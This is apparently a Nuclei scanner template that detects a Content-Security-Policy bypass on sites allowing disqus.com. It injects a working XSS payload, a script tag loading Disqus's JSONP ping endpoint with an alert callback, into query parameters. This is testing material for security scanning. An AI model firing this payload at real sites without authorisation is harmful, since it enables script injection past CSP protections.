id: disqus-links-csp-bypass
info:
name: Content-Security-Policy Bypass - Disqus Links
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,disqus-links,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "disqus.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: disqus_links_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://links.services.disqus.com/api/ping?format=jsonp&key=cfdfcf52dffd0a702a61bad27507376d&loc=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Fhealth%2F2013%2F03%2F21%2F1-in-10-u-s-deaths-blamed-on-salt%2F&subId=2329827&v=1&jsonp=alert"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "disqus_links_csp_xss == true"
# digest: 4a0a004730450220663bb3bfa4d1f2e4d553102073f0186b50505ee874ea8e062a6a9399c19271a1022100cda2bb5d40c533038021e523cf54f39d5c8f99a9aecbc1ba66910b12d7078e78:922c64590222798bb761d5b6d8e72950